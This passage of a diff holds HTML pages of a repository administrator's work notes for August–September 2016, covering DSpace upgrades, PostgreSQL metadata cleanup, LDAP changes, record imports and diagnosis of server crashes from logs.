+$ ln -sv ~/dspace/webapps/solr /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/solr
+

2016-08-09

+ +

2016-08-10

+
    +
  • Turns out DSpace 5.x isn’t ready for Tomcat 8: https://jira.duraspace.org/browse/DS-3092
  • +
  • So we’ll need to use Tomcat 7 + Java 8 on Ubuntu 16.04
  • +
  • More work on the Ansible stuff for this, allowing Tomcat 7 to use Java 8
  • +
  • Merge pull request for fixing the type Discovery index to use dc.type (#262)
  • +
  • Merge pull request for removing “Bitstream” text from item display, as it confuses users and isn’t necessary (#263)
  • +
+

2016-08-11

+
    +
  • Finally got DSpace (5.5) running on Ubuntu 16.04, Tomcat 7, Java 8, PostgreSQL 9.5 via the updated Ansible stuff
  • +
+

DSpace 5.5 on Ubuntu 16.04, Tomcat 7, Java 8, PostgreSQL 9.5

+

2016-08-14

+ +

2016-08-15

+ +

ExpressJS running behind nginx

+

2016-08-16

+
    +
  • Troubleshoot Paramiko connection issues with Ansible on ILRI servers: #37
  • +
  • Turns out we need to add some MACs to our sshd_config: hmac-sha2-512,hmac-sha2-256
  • +
  • Update DSpace Test’s Java to version 8 to start testing this configuration (seeing as Solr recommends it)
  • +
+

2016-08-17

+
    +
  • More work on Let’s Encrypt stuff for Ansible roles
  • +
  • Yesterday Atmire responded about DSpace 5.5 issues and asked me to try the dspace database repair command to fix Flyway issues
  • +
  • The dspace database command doesn’t even run: https://gist.github.com/alanorth/c43c8d89e8df346d32c0ee938be90cd5
  • +
  • Oops, it looks like the missing classes causing dspace database to fail were coming from the old ~/dspace/config/spring folder
  • +
  • After removing the spring folder and running ant install again, dspace database works
  • +
  • I see there are missing and pending Flyway migrations, but running dspace database repair and dspace database migrate does nothing: https://gist.github.com/alanorth/41ed5abf2ff32d8ac9eedd1c3d015d70
  • +
+

2016-08-18

+
    +
  • Fix “CONGO,DR” country name in input-forms.xml (#264)
  • +
  • Also need to fix existing records using the incorrect form in the database:
  • +
+
dspace=# update metadatavalue set text_value='CONGO, DR' where resource_type_id=2 and metadata_field_id=228 and text_value='CONGO,DR';
+
    +
  • I asked a question on the DSpace mailing list about updating “preferred” forms of author names from ORCID
  • +
+

2016-08-21

+
    +
  • A few days ago someone on the DSpace mailing list suggested I try dspace dsrun org.dspace.authority.UpdateAuthorities to update preferred author names from ORCID
  • +
  • If you set auto-update-items=true in dspace/config/modules/solrauthority.cfg it is supposed to update records it finds automatically
  • +
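  • Putting those two pieces together, my understanding is that it should be as simple as this (paths assumed):

# with auto-update-items = true set in dspace/config/modules/solrauthority.cfg
$ ~/dspace/bin/dspace dsrun org.dspace.authority.UpdateAuthorities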
  • I updated my name format on ORCID and I’ve been running that script a few times per day since then but nothing has changed
  • +
  • Still troubleshooting Atmire modules on DSpace 5.5
  • +
  • I sent them some new verbose logs: https://gist.github.com/alanorth/700748995649688148ceba89d760253e
  • +
+

2016-08-22

+
    +
  • Database migrations are fine on DSpace 5.1:
  • +
+
$ ~/dspace/bin/dspace database info
+
+Database URL: jdbc:postgresql://localhost:5432/dspacetest
+Database Schema: public
+Database Software: PostgreSQL version 9.3.14
+Database Driver: PostgreSQL Native Driver version PostgreSQL 9.1 JDBC4 (build 901)
+
++----------------+----------------------------+---------------------+---------+
+| Version        | Description                | Installed on        | State   |
++----------------+----------------------------+---------------------+---------+
+| 1.1            | Initial DSpace 1.1 databas |                     | PreInit |
+| 1.2            | Upgrade to DSpace 1.2 sche |                     | PreInit |
+| 1.3            | Upgrade to DSpace 1.3 sche |                     | PreInit |
+| 1.3.9          | Drop constraint for DSpace |                     | PreInit |
+| 1.4            | Upgrade to DSpace 1.4 sche |                     | PreInit |
+| 1.5            | Upgrade to DSpace 1.5 sche |                     | PreInit |
+| 1.5.9          | Drop constraint for DSpace |                     | PreInit |
+| 1.6            | Upgrade to DSpace 1.6 sche |                     | PreInit |
+| 1.7            | Upgrade to DSpace 1.7 sche |                     | PreInit |
+| 1.8            | Upgrade to DSpace 1.8 sche |                     | PreInit |
+| 3.0            | Upgrade to DSpace 3.x sche |                     | PreInit |
+| 4.0            | Initializing from DSpace 4 | 2015-11-20 12:42:52 | Success |
+| 5.0.2014.08.08 | DS-1945 Helpdesk Request a | 2015-11-20 12:42:53 | Success |
+| 5.0.2014.09.25 | DS 1582 Metadata For All O | 2015-11-20 12:42:55 | Success |
+| 5.0.2014.09.26 | DS-1582 Metadata For All O | 2015-11-20 12:42:55 | Success |
+| 5.0.2015.01.27 | MigrateAtmireExtraMetadata | 2015-11-20 12:43:29 | Success |
+| 5.1.2015.12.03 | Atmire CUA 4 migration     | 2016-03-21 17:10:41 | Success |
+| 5.1.2015.12.03 | Atmire MQM migration       | 2016-03-21 17:10:42 | Success |
++----------------+----------------------------+---------------------+---------+
+
    +
  • So I’m not sure why they have problems when we move to DSpace 5.5 (even the 5.1 migrations themselves show as “Missing”)
  • +
+

2016-08-23

+
    +
  • Help Paola from CCAFS with her thumbnails again
  • +
  • Talk to Atmire about the DSpace 5.5 issue, and it seems to be caused by a bug in FlywayDB
  • +
  • They said I should delete the Atmire migrations
  • +
+
dspacetest=# delete from schema_version where description =  'Atmire CUA 4 migration' and version='5.1.2015.12.03.2';
+dspacetest=# delete from schema_version where description =  'Atmire MQM migration' and version='5.1.2015.12.03.3';
+
    +
  • After that DSpace starts up, but XMLUI now has unrelated issues that I need to solve!
  • +
+
org.apache.avalon.framework.configuration.ConfigurationException: Type 'ThemeResourceReader' does not exist for 'map:read' at jndi:/localhost/themes/0_CGIAR/sitemap.xmap:136:77
+context:/jndi:/localhost/themes/0_CGIAR/sitemap.xmap - 136:77
+
    +
  • Looks like we’re missing some stuff in the XMLUI module’s sitemap.xmap, as well as in each of our XMLUI themes
  • +
  • Diff them with these to get the ThemeResourceReader changes: +
      +
    • dspace-xmlui/src/main/webapp/sitemap.xmap
    • +
    • dspace-xmlui-mirage2/src/main/webapp/sitemap.xmap
    • +
    +
  • +
  • Then we had some NullPointerException from the SolrLogger class, which is apparently part of Atmire’s CUA module
  • +
  • I tried with a small version bump to CUA but it didn’t work (version 5.5-4.1.1-0)
  • +
  • Also, I started looking into huge pages to prepare for PostgreSQL 9.5, but it seems Linode’s kernels don’t enable them
  • +
+

2016-08-24

+
    +
  • Clean up and import 48 CCAFS records into DSpace Test
  • +
  • SQL to get all journal titles from dc.source (55), since it’s apparently used for internal DSpace filename shit, but we moved all our journal titles there a few months ago:
  • +
+
dspacetest=# select distinct text_value from metadatavalue where metadata_field_id=55 and text_value !~ '.*(\.pdf|\.png|\.PDF|\.Pdf|\.JPEG|\.jpg|\.JPG|\.jpeg|\.xls|\.rtf|\.docx?|\.potx|\.dotx|\.eqa|\.tiff|\.mp4|\.mp3|\.gif|\.zip|\.txt|\.pptx|\.indd|\.PNG|\.bmp|\.exe|org\.dspace\.app\.mediafilter).*';
+

2016-08-25

+
    +
  • Atmire suggested adding a missing bean to dspace/config/spring/api/atmire-cua.xml but it doesn’t help:
  • +
+
...
+Error creating bean with name 'MetadataStorageInfoService'
+...
+
    +
  • Atmire sent an updated version of dspace/config/spring/api/atmire-cua.xml and now XMLUI starts but gives a null pointer exception:
  • +
+
Java stacktrace: java.lang.NullPointerException
+    at org.dspace.app.xmlui.aspect.statistics.Navigation.addOptions(Navigation.java:129)
+    at org.dspace.app.xmlui.wing.AbstractWingTransformer.startElement(AbstractWingTransformer.java:228)
+    at sun.reflect.GeneratedMethodAccessor126.invoke(Unknown Source)
+    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+    at java.lang.reflect.Method.invoke(Method.java:606)
+    at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+    at com.sun.proxy.$Proxy103.startElement(Unknown Source)
+    at org.apache.cocoon.environment.internal.EnvironmentChanger.startElement(EnvironmentStack.java:140)
+    at org.apache.cocoon.environment.internal.EnvironmentChanger.startElement(EnvironmentStack.java:140)
+    at org.apache.cocoon.xml.AbstractXMLPipe.startElement(AbstractXMLPipe.java:94)
+...
+
    +
  • Import the 47 CCAFS records to CGSpace, creating the SimpleArchiveFormat bundles and importing like:
  • +
+
$ ./safbuilder.sh -c /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/3546.csv
+$ JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m" /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/3546 -s /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/SimpleArchiveFormat -m 3546.map
+
    +
  • Finally got DSpace 5.5 working with the Atmire modules after a few rounds of back and forth with Atmire devs
  • +
+

2016-08-26

+
    +
  • CGSpace had issues tonight, not entirely crashing, but becoming unresponsive
  • +
  • The dspace log had this:
  • +
+
2016-08-26 20:48:05,040 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -                                                               org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
+
    +
  • Related to /rest no doubt
  • +
+

2016-08-27

+
    +
  • Run corrections for Delia Grace and CONGO, DR, and deploy August changes to CGSpace
  • +
  • Run all system updates and reboot the server
  • +
diff --git a/docs/2016-09/index.html b/docs/2016-09/index.html (new file)

September, 2016

+ +
+

2016-09-01

+
    +
  • Discuss helping CCAFS with some batch tagging of ORCID IDs for their authors
  • +
  • Discuss how the migration of CGIAR’s Active Directory to a flat structure will break our LDAP groups in DSpace
  • +
  • We had been using DC=ILRI to determine whether a user was ILRI or not
  • +
  • It looks like we might be able to use OUs now, instead of DCs:
  • +
+
$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
+
    +
  • User who has been migrated to the root vs user still in the hierarchical structure:
  • +
+
distinguishedName: CN=Last\, First (ILRI),OU=ILRI Kenya Employees,OU=ILRI Kenya,OU=ILRIHUB,DC=CGIARAD,DC=ORG
+distinguishedName: CN=Last\, First (ILRI),OU=ILRI Ethiopia Employees,OU=ILRI Ethiopia,DC=ILRI,DC=CGIARAD,DC=ORG
+
    +
  • Changing the DSpace LDAP config to use OU=ILRIHUB seems to work:
  • +
+

DSpace groups based on LDAP DN

+
    +
  • Notes for local PostgreSQL database recreation from production snapshot:
  • +
+
$ dropdb dspacetest
+$ createdb -O dspacetest --encoding=UNICODE dspacetest
+$ psql dspacetest -c 'alter user dspacetest createuser;'
+$ pg_restore -O -U dspacetest -d dspacetest ~/Downloads/cgspace_2016-09-01.backup
+$ psql dspacetest -c 'alter user dspacetest nocreateuser;'
+$ psql -U dspacetest -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest -h localhost
+$ vacuumdb dspacetest
+
    +
  • Some names that I thought I fixed in July seem not to be:
  • +
+
dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
+      text_value       |              authority               | confidence
+-----------------------+--------------------------------------+------------
+ Poole, Elizabeth Jane | b6efa27f-8829-4b92-80fe-bc63e03e3ccb |        600
+ Poole, Elizabeth Jane | 41628f42-fc38-4b38-b473-93aec9196326 |        600
+ Poole, Elizabeth Jane | 83b82da0-f652-4ebc-babc-591af1697919 |        600
+ Poole, Elizabeth Jane | c3a22456-8d6a-41f9-bba0-de51ef564d45 |        600
+ Poole, E.J.           | c3a22456-8d6a-41f9-bba0-de51ef564d45 |        600
+ Poole, E.J.           | 0fbd91b9-1b71-4504-8828-e26885bf8b84 |        600
+(6 rows)
+
    +
  • At least a few of these actually have the correct ORCID, but I will unify the authority to be c3a22456-8d6a-41f9-bba0-de51ef564d45
  • +
+
dspacetest=# update metadatavalue set authority='c3a22456-8d6a-41f9-bba0-de51ef564d45', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
+UPDATE 69
+
    +
  • And for Peter Ballantyne:
  • +
+
dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
+    text_value     |              authority               | confidence
+-------------------+--------------------------------------+------------
+ Ballantyne, Peter | 2dcbcc7b-47b0-4fd7-bef9-39d554494081 |        600
+ Ballantyne, Peter | 4f04ca06-9a76-4206-bd9c-917ca75d278e |        600
+ Ballantyne, P.G.  | 4f04ca06-9a76-4206-bd9c-917ca75d278e |        600
+ Ballantyne, Peter | ba5f205b-b78b-43e5-8e80-0c9a1e1ad2ca |        600
+ Ballantyne, Peter | 20f21160-414c-4ecf-89ca-5f2cb64e75c1 |        600
+(5 rows)
+
    +
  • Again, a few have the correct ORCID, but there should only be one authority…
  • +
+
dspacetest=# update metadatavalue set authority='4f04ca06-9a76-4206-bd9c-917ca75d278e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
+UPDATE 58
+
    +
  • And for me:
  • +
+
dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, A%';
+ text_value |              authority               | confidence
+------------+--------------------------------------+------------
+ Orth, Alan | 4884def0-4d7e-4256-9dd4-018cd60a5871 |        600
+ Orth, A.   | 4884def0-4d7e-4256-9dd4-018cd60a5871 |        600
+ Orth, A.   | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
+(3 rows)
+dspacetest=# update metadatavalue set authority='1a1943a0-3f87-402f-9afe-e52fb46a513e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, %';
+UPDATE 11
+
    +
  • And for CCAFS author Bruce Campbell that I had discussed with CCAFS earlier this week:
  • +
+
dspacetest=# update metadatavalue set authority='0e414b4c-4671-4a23-b570-6077aca647d8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
+UPDATE 166
+dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
+       text_value       |              authority               | confidence
+------------------------+--------------------------------------+------------
+ Campbell, Bruce        | 0e414b4c-4671-4a23-b570-6077aca647d8 |        600
+ Campbell, Bruce Morgan | 0e414b4c-4671-4a23-b570-6077aca647d8 |        600
+ Campbell, B.           | 0e414b4c-4671-4a23-b570-6077aca647d8 |        600
+ Campbell, B.M.         | 0e414b4c-4671-4a23-b570-6077aca647d8 |        600
+(4 rows)
+
    +
  • After updating the Authority indexes (bin/dspace index-authority) everything looks good
  • +
  • Run authority updates on CGSpace
  • +
+

2016-09-05

+
    +
  • After one week of logging TLS connections on CGSpace:
  • +
+
# zgrep "DES-CBC3" /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
+217
+# zcat -f -- /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
+1164376
+# zgrep "DES-CBC3" /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | awk '{print $6}' | sort | uniq
+TLSv1/DES-CBC3-SHA
+TLSv1/EDH-RSA-DES-CBC3-SHA
+
    +
  • So this represents 0.02% of 1.16M connections over a one-week period
  • +
  • Transforming some filenames in OpenRefine so they can have a useful description for SAFBuilder:
  • +
+
value + "__description:" + cells["dc.type"].value
+
    +
  • This gives you, for example: Mainstreaming gender in agricultural R&D.pdf__description:Brief
  • +
+

2016-09-06

+
    +
  • Trying to import the records for CIAT from yesterday, but having filename encoding issues from their zip file
  • +
  • Create a zip on Mac OS X from a SAF bundle containing only one record with one PDF: +
      +
    • Filename: Complementing Farmers Genetic Knowledge Farmer Breeding Workshop in Turipaná, Colombia.pdf
    • +
    • Imports fine on DSpace running on Mac OS X
    • +
    • Fails to import on DSpace running on Linux with error No such file or directory
    • +
    +
  • +
  • Change diacritic in file name from á to a and re-create SAF bundle and zip +
      +
    • Success on both Mac OS X and Linux…
    • +
    +
  • +
  • Looks like the Mac OS X file system stores file names in decomposed Unicode form, so á is represented as: a (U+0061) + combining acute accent (U+0301)
  • +
  • See: http://www.fileformat.info/info/unicode/char/e1/index.htm
  • +
  • See: http://demo.icu-project.org/icu-bin/nbrowser?t=%C3%A1&s=&uv=0
  • +
  • If I unzip the original zip from CIAT on Windows, re-zip it with 7zip on Windows, and then unzip it on Linux directly, the file names seem to be proper UTF-8
  • +
  • We should definitely clean filenames so they don’t use characters that are tricky to process in CSV and shell scripts, like commas (,), apostrophes ('), and double quotes (")
  • +
+
value.replace("'","").replace(",","").replace('"','')
+
    +
  • I need to write a Python script to match that for renaming files in the file system (see the sketch at the end of this day’s notes)
  • +
  • When importing SAF bundles it seems you can specify the target collection on the command line using -c 10568/4003 or in the collections file inside each item in the bundle
  • +
  • Seems that the latter method causes a null pointer exception, so I will just have to use the former method
  • +
  • In the end I was able to import the files after unzipping them ONLY on Linux +
      +
    • The CSV file was giving file names in UTF-8, but unzipping the zip on Mac OS X and transferring it was converting the file names to their decomposed Unicode equivalents, as I saw above
    • +
    +
  • +
  • Import CIAT Gender Network records to CGSpace, first creating the SAF bundles as my user, then importing as the tomcat7 user, and deleting the bundle, for each collection’s items:
  • +
+
$ ./safbuilder.sh -c /home/aorth/ciat-gender-2016-09-06/66601.csv
+$ JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m" /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/66601 -s /home/aorth/ciat-gender-2016-09-06/SimpleArchiveFormat -m 66601.map
+$ rm -rf ~/ciat-gender-2016-09-06/SimpleArchiveFormat/
+
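  • A minimal sketch of the rename script mentioned above (assuming the unpacked SAF bundle is in SimpleArchiveFormat; the path is just an example), mirroring the OpenRefine expression and recomposing file names to NFC:

#!/usr/bin/env python3
# Sketch: strip characters that are tricky in CSV and shell scripts (, ' ")
# from file names and normalize them to NFC so Linux and Mac OS X agree on
# the bytes. The bundle path is just an example.
import os
import unicodedata

BUNDLE_DIR = "SimpleArchiveFormat"  # hypothetical path to the unpacked SAF bundle

for root, dirs, files in os.walk(BUNDLE_DIR):
    for name in files:
        # mirror the OpenRefine expression: remove apostrophes, commas, double quotes
        clean = name.replace("'", "").replace(",", "").replace('"', "")
        # recompose a (U+0061) + combining acute (U+0301) into á (U+00E1)
        clean = unicodedata.normalize("NFC", clean)
        if clean != name:
            os.rename(os.path.join(root, name), os.path.join(root, clean))
            print("renamed: {} -> {}".format(name, clean))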

2016-09-07

+
    +
  • Erase and rebuild DSpace Test based on latest Ubuntu 16.04, PostgreSQL 9.5, and Java 8 stuff
  • +
  • Reading about PostgreSQL maintenance and it seems manual vacuuming is only for certain workloads, such as heavy update/write loads
  • +
  • I suggest we disable our nightly manual vacuum task, as we’re a mostly read workload, and I’d rather stick as close to the documentation as possible since we haven’t done any testing/observation of PostgreSQL
  • +
  • See: https://www.postgresql.org/docs/9.3/static/routine-vacuuming.html
  • +
  • CGSpace went down and the error seems to be the same as always (lately):
  • +
+
2016-09-07 11:39:23,162 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
+org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
+...
+
    +
  • Since CGSpace had crashed I quickly deployed the new LDAP settings before restarting Tomcat
  • +
+

2016-09-13

+
    +
  • CGSpace crashed twice today, errors from catalina.out:
  • +
+
org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
+        at org.apache.commons.dbcp.PoolingDataSource.getConnection(PoolingDataSource.java:114)
+
    +
  • I enabled logging of requests to /rest again
  • +
+

2016-09-14

+
    +
  • CGSpace crashed again, errors from catalina.out:
  • +
+
org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
+        at org.apache.commons.dbcp.PoolingDataSource.getConnection(PoolingDataSource.java:114)
+
    +
  • I restarted Tomcat and it was ok again
  • +
  • CGSpace crashed a few hours later, errors from catalina.out:
  • +
+
Exception in thread "http-bio-127.0.0.1-8081-exec-25" java.lang.OutOfMemoryError: Java heap space
+        at java.lang.StringCoding.decode(StringCoding.java:215)
+
    +
  • We haven’t seen that in quite a while…
  • +
  • Indeed, in a month of logs it only occurs 15 times:
  • +
+
# grep -rsI "OutOfMemoryError" /var/log/tomcat7/catalina.* | wc -l
+15
+
    +
  • I also see a bunch of errors from dspace.log:
  • +
+
2016-09-14 12:23:07,981 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
+org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
+
    +
  • Looking at REST requests, it seems there is one IP hitting us nonstop:
  • +
+
# awk '{print $1}' /var/log/nginx/rest.log  | sort -n | uniq -c | sort -h | tail -n 3
+    820 50.87.54.15
+  12872 70.32.99.142
+  25744 70.32.83.92
+# awk '{print $1}' /var/log/nginx/rest.log.1  | sort -n | uniq -c | sort -h | tail -n 3
+   7966 181.118.144.29
+  54706 70.32.99.142
+ 109412 70.32.83.92
+
    +
  • Those are the same IPs that were hitting us heavily in July, 2016 as well…
  • +
  • I think the stability issues are definitely from REST
  • +
  • Crashed AGAIN, errors from dspace.log:
  • +
+
2016-09-14 14:31:43,069 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
+org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
+
    +
  • And more heap space errors:
  • +
+
# grep -rsI "OutOfMemoryError" /var/log/tomcat7/catalina.* | wc -l
+19
+
    +
  • There are no more REST requests since the last crash, so maybe there are other things causing this.
  • +
  • Hmm, I noticed a shitload of IPs from 180.76.0.0/16 are connecting to both CGSpace and DSpace Test (58 unique IPs concurrently!)
  • +
  • They seem to be coming from Baidu, and so far today alone they account for about one sixth of all connections:
  • +
+
# grep -c ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-14
+29084
+# grep -c ip_addr=180.76.15 /home/cgspace.cgiar.org/log/dspace.log.2016-09-14
+5192
+
    +
  • Other recent days are the same… hmmm.
  • +
  • From the activity control panel I can see 58 unique IPs hitting the site concurrently, which has GOT to hurt our stability
  • +
  • A list of all 2000 unique IPs from CGSpace logs today:
  • +
+
# grep ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-11 | awk -F: '{print $5}' | sort -n | uniq -c | sort -h | tail -n 100
+
    +
  • Looking at the top 20 IPs or so, most are Yahoo, MSN, Google, Baidu, TurnitIn (iParadigm), etc… do we have any real users?
  • +
  • Generate a list of all author affiliations for Peter Ballantyne to go through, make corrections, and create a lookup list from:
  • +
+
dspacetest=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=211 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
+
    +
  • Looking into the Catalina logs again around the time of the first crash, I see:
  • +
+
Wed Sep 14 09:47:27 UTC 2016 | Query:id: 78581 AND type:2
+Wed Sep 14 09:47:28 UTC 2016 | Updating : 6/6 docs.
+Commit
+Commit done
+dn:CN=Haman\, Magdalena  (CIAT-CCAFS),OU=Standard,OU=Users,OU=HQ,OU=CIATHUB,dc=cgiarad,dc=org
+Exception in thread "http-bio-127.0.0.1-8081-exec-193" java.lang.OutOfMemoryError: Java heap space
+
    +
  • And after that I see a bunch of “pool error Timeout waiting for idle object”
  • +
  • Later, near the time of the next crash I see:
  • +
+
dn:CN=Haman\, Magdalena  (CIAT-CCAFS),OU=Standard,OU=Users,OU=HQ,OU=CIATHUB,dc=cgiarad,dc=org
+Wed Sep 14 11:29:55 UTC 2016 | Query:id: 79078 AND type:2
+Wed Sep 14 11:30:20 UTC 2016 | Updating : 6/6 docs.
+Commit
+Commit done
+Sep 14, 2016 11:32:22 AM com.sun.jersey.server.wadl.generators.WadlGeneratorJAXBGrammarGenerator buildModelAndSchemas
+SEVERE: Failed to generate the schema for the JAX-B elements
+com.sun.xml.bind.v2.runtime.IllegalAnnotationsException: 2 counts of IllegalAnnotationExceptions
+java.util.Map is an interface, and JAXB can't handle interfaces.
+        this problem is related to the following location:
+                at java.util.Map
+                at public java.util.Map com.atmire.dspace.rest.common.Statlet.getRender()
+                at com.atmire.dspace.rest.common.Statlet
+java.util.Map does not have a no-arg default constructor.
+        this problem is related to the following location:
+                at java.util.Map
+                at public java.util.Map com.atmire.dspace.rest.common.Statlet.getRender()
+                at com.atmire.dspace.rest.common.Statlet
+
    +
  • Then 20 minutes later another outOfMemoryError:
  • +
+
Exception in thread "http-bio-127.0.0.1-8081-exec-25" java.lang.OutOfMemoryError: Java heap space
+        at java.lang.StringCoding.decode(StringCoding.java:215)
+
    +
  • Perhaps these particular issues are memory issues, the munin graphs definitely show some weird purging/allocating behavior starting this week
  • +
+

Tomcat JVM usage day +Tomcat JVM usage week +Tomcat JVM usage month

+
    +
  • And really, we did reduce the memory of CGSpace in late 2015, so maybe we should just increase it again, now that our usage is higher and we are having memory errors in the logs
  • +
  • Oh great, the configuration on the actual server is different than in configuration management!
  • +
  • Seems we added a bunch of settings to the /etc/default/tomcat7 in December, 2015 and never updated our ansible repository:
  • +
+
JAVA_OPTS="-Djava.awt.headless=true -Xms3584m -Xmx3584m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -XX:-UseGCOverheadLimit -XX:MaxGCPauseMillis=250 -XX:GCTimeRatio=9 -XX:+PerfDisableSharedMem -XX:+ParallelRefProcEnabled -XX:G1HeapRegionSize=8m -XX:InitiatingHeapOccupancyPercent=75 -XX:+UseLargePages -XX:+AggressiveOpts"
+
    +
  • So I’m going to bump the heap +512m and remove all the other experimental shit (and update ansible!)
  • +
  • Increased JVM heap to 4096m on CGSpace (linode01)
  • +
+

2016-09-15

+
    +
  • Looking at Google Webmaster Tools again, it seems the work I did on URL query parameters and blocking via the X-Robots-Tag HTTP header in March, 2016 has had a positive effect on Google’s index for CGSpace
  • +
+

Google Webmaster Tools for CGSpace

+

2016-09-16

+
    +
  • CGSpace crashed again, and there are TONS of heap space errors but the datestamps aren’t on those lines so I’m not sure if they were yesterday:
  • +
+
dn:CN=Orentlicher\, Natalie (CIAT),OU=Standard,OU=Users,OU=HQ,OU=CIATHUB,dc=cgiarad,dc=org
+Thu Sep 15 18:45:25 UTC 2016 | Query:id: 55785 AND type:2
+Thu Sep 15 18:45:26 UTC 2016 | Updating : 100/218 docs.
+Thu Sep 15 18:45:26 UTC 2016 | Updating : 200/218 docs.
+Thu Sep 15 18:45:27 UTC 2016 | Updating : 218/218 docs.
+Commit
+Commit done
+Exception in thread "http-bio-127.0.0.1-8081-exec-247" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-241" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-243" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-258" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-268" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-263" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-280" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "Thread-54216" org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Exception writing document id 7feaa95d-8e1f-4f45-80bb
+-e14ef82ee224 to the index; possible analysis error.
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:116)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:102)
+        at com.atmire.statistics.SolrLogThread.run(SourceFile:25)
+
    +
  • I bumped the heap space from 4096m to 5120m to see if this is really about heap space or not.
  • +
  • Looking into some of these errors that I’ve seen this week but haven’t noticed before:
  • +
+
# zcat -f -- /var/log/tomcat7/catalina.* | grep -c 'Failed to generate the schema for the JAX-B elements'
+113
+
    +
  • I’ve sent a message to Atmire about the Solr error to see if it’s related to their batch update module
  • +
+

2016-09-19

+
    +
  • Work on cleanups for author affiliations after Peter sent me his list of corrections/deletions:
  • +
+
$ ./fix-metadata-values.py -i affiliations_pb-322-corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p fuuu
+$ ./delete-metadata-values.py -f cg.contributor.affiliation -i affiliations_pb-2-deletions.csv -m 211 -u dspace -d dspace -p fuuu
+
    +
  • After that we need to take the top ~300 and make a controlled vocabulary for it
  • +
  • I dumped a list of the top 300 affiliations from the database, sorted it alphabetically in OpenRefine, and created a controlled vocabulary for it (#267); a scripted version of that sort is sketched below
  • +
+
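  • A rough sketch of that top-300 selection, assuming the /tmp/affiliations.csv dump from 2016-09-14 (text_value,count columns, no header):

#!/usr/bin/env python3
# Sketch: take the top 300 affiliations by count from the CSV dump and print
# them alphabetically, ready to paste into a controlled vocabulary.
import csv

with open("/tmp/affiliations.csv", newline="") as f:
    rows = [(text_value, int(count)) for text_value, count in csv.reader(f)]

top300 = sorted(rows, key=lambda row: row[1], reverse=True)[:300]

for text_value in sorted(text_value for text_value, _ in top300):
    print(text_value)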

2016-09-20

+
    +
  • Run all system updates on DSpace Test and reboot the server
  • +
  • Merge changes for sponsorship and affiliation controlled vocabularies (#267, #268)
  • +
  • Merge minor changes to messages.xml to reconcile it with the stock DSpace 5.1 one (#269)
  • +
  • Peter asked about adding title search to Discovery
  • +
  • The index was already defined, so I just added it to the search filters
  • +
  • It works but CGSpace apparently uses OR for search terms, which makes the search results basically useless
  • +
  • I need to read the docs and ask on the mailing list to see if we can tweak that
  • +
